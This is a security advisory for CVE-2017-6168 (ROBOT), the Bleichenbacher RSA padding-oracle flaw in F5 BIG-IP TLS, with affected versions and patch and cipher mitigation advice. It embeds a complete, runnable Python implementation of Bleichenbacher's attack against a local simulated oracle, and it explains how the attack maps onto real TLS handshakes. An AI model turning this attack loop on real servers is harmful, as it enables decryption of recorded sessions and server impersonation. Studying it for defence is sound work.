PT-2017-16927 · F5 · Big-Ip
Published
2017-11-17
·
Updated
2021-09-23
·
CVE-2017-6168
CVSS v3.1
7.4
High
Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions
BIG-IP versions 11.6.0 through 11.6.2
BIG-IP versions 12.0.0 through 12.1.2 HF1
BIG-IP versions 13.0.0 through 13.0.0 HF2
Description
A BIG-IP virtual server that accepts TLS cipher suites with RSA key exchange responds to a malformed RSA-encrypted ClientKeyExchange in a way that reveals whether the decrypted block was correctly PKCS#1 v1.5 padded. This turns the server into a padding oracle for an adaptive chosen-ciphertext attack on RSA, the Bleichenbacher attack: by submitting many ciphertexts derived from one recorded ClientKeyExchange and observing the server's responses, an attacker can recover that session's pre-master secret, and with it the session keys of a recorded RSA-key-exchange session, or can compute an RSA signature with the server's private key and use it to impersonate the server in a man-in-the-middle (MiTM) attack. The private key itself is never exposed. This instance of the attack was published as ROBOT (Return Of Bleichenbacher's Oracle Threat).
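The attack described above, as an added example that is not part of this advisory or of any F5 code: Bleichenbacher's algorithm run against a local padding oracle. The oracle stands in for the vulnerable BIG-IP TLS stack; it holds a constructed, reproducible 256-bit demo key (assumed, far too small for real use) and, like the real server, answers only whether the RSA-decrypted block begins with 00 02. The "captured ClientKeyExchange" is a ciphertext the example builds itself. The loop recovers the padded pre-master secret with roughly 2^16 oracle queries for the first conforming multiplier (a property of the 16-bit prefix check, not of the key size) plus a few hundred more to narrow the interval, without ever reading the private exponent. The signature-forging MiTM variant uses the same loop on a padded hash, but that input is not conforming to begin with and needs the blinding step (step 1 of the paper), which this example omits.

```python
"""Added example: Bleichenbacher's adaptive chosen-ciphertext attack on RSA PKCS#1 v1.5,
run against a local padding oracle with a constructed 256-bit demo key (not F5 code)."""
import math
import random


def _ceildiv(a, b):
    return -(-a // b)


def _is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin, adequate for a throwaway demo key."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits, rng):
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1   # full length and odd
        if _is_probable_prime(cand, rng):
            return cand


def gen_rsa_key(bits, rng, e=65537):
    """Returns (n, e, d, p, q) for a demo key; never generate real keys this way."""
    while True:
        p, q = _gen_prime(bits // 2, rng), _gen_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi), p, q


def pkcs1_v15_pad(msg, k, rng):
    """EME-PKCS1-v1_5: 00 02 <at least 8 random non-zero bytes> 00 <msg>."""
    ps_len = k - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long for modulus")
    return b"\x00\x02" + bytes(rng.randrange(1, 256) for _ in range(ps_len)) + b"\x00" + msg


def pkcs1_v15_unpad(block):
    if block[:2] != b"\x00\x02":
        raise ValueError("bad padding")
    return block[block.index(b"\x00", 2) + 1:]


class PaddingOracle:
    """Stand-in for a TLS server whose error or timing behaviour reveals whether the
    RSA-decrypted ClientKeyExchange begins with 00 02.  It holds the private key and
    decrypts with CRT as real servers do, but returns only that one bit."""

    def __init__(self, p, q, d):
        self.p, self.q, self.n = p, q, p * q
        self.dp, self.dq, self.qinv = d % (p - 1), d % (q - 1), pow(q, -1, p)
        self.k = (self.n.bit_length() + 7) // 8
        self.queries = 0

    def __call__(self, c):
        self.queries += 1
        m1, m2 = pow(c % self.p, self.dp, self.p), pow(c % self.q, self.dq, self.q)
        m = m2 + self.q * ((m1 - m2) * self.qinv % self.p)      # Garner recombination
        return m.to_bytes(self.k, "big")[:2] == b"\x00\x02"


def bleichenbacher(oracle, n, e, c):
    """Recover c^d mod n using oracle queries only (Bleichenbacher 1998).  c is assumed
    PKCS-conforming already, as a real ClientKeyExchange is, so blinding (s0) is skipped."""
    k = (n.bit_length() + 7) // 8
    B = 1 << (8 * (k - 2))                    # conforming plaintexts lie in [2B, 3B)

    def conforming(s):
        return oracle(c * pow(s, e, n) % n)   # does m*s mod n decrypt to 00 02 ...?

    M = [(2 * B, 3 * B - 1)]
    s = _ceildiv(n, 3 * B)                    # step 2a: smallest s that can wrap m*s past n
    while not conforming(s):
        s += 1
    while True:
        new = []                              # step 3: every m in M satisfies 2B <= m*s - r*n < 3B
        for a, b in M:
            for r in range(_ceildiv(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, _ceildiv(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = new
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]                    # step 4: interval collapsed to m (s0 = 1, no unblinding)
        if len(M) > 1:                        # step 2b: several intervals, keep scanning s upward
            s += 1
            while not conforming(s):
                s += 1
        else:                                 # step 2c: one interval, choose r so each hit halves it
            a, b = M[0]
            r = _ceildiv(2 * (b * s - 2 * B), n)
            while True:
                cands = range(_ceildiv(2 * B + r * n, b), (3 * B - 1 + r * n) // a + 1)
                found = next((t for t in cands if conforming(t)), None)
                if found is not None:
                    s = found
                    break
                r += 1


def run_demo(bits=256, seed=2017, secret=b"premaster:0303cafe"):
    """Constructed scenario: a client encrypts `secret` to the server, the attacker recovers it."""
    rng = random.Random(seed)                 # reproducible demo key and padding, not real randomness
    n, e, d, p, q = gen_rsa_key(bits, rng)
    k = (n.bit_length() + 7) // 8
    c = pow(int.from_bytes(pkcs1_v15_pad(secret, k, rng), "big"), e, n)   # "captured" ClientKeyExchange
    oracle = PaddingOracle(p, q, d)
    m = bleichenbacher(oracle, n, e, c)
    return pkcs1_v15_unpad(m.to_bytes(k, "big")), oracle.queries


if __name__ == "__main__":
    plain, queries = run_demo()
    print(f"recovered {plain!r} after {queries} oracle queries without touching d")
```

Against a real server each `oracle(...)` call is a full TLS handshake whose ClientKeyExchange carries the modified ciphertext, and the one bit is read from the alert, the timing or the connection behaviour; everything else in the loop is identical. Using the exact "starts with 00 02" check as the oracle is the best case for the attacker; a stricter oracle (one that also checks for the 00 separator) only makes step 2 slower, since every positive answer is still correct.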
Recommendations
For BIG-IP versions 11.6.0 through 11.6.2, update to 11.6.2 HF1.
For BIG-IP versions 12.0.0 through 12.1.2 HF1, update to 12.1.2 HF2.
For BIG-IP versions 13.0.0 through 13.0.0 HF2, update to 13.0.0 HF3.
Until the hotfix is applied, removing cipher suites that use RSA key exchange (leaving only DHE and ECDHE suites) from the affected Client SSL profiles removes the padding oracle; this is the generic ROBOT mitigation, not an F5-specific setting. Any other endpoint that still accepts RSA key exchange with the same RSA certificate can serve as the oracle for a signature-forging attack against this one, so the suites must be removed everywhere the key is used.
Exploit
Fix
Side Channel Attack
Affected Products
Big-Ip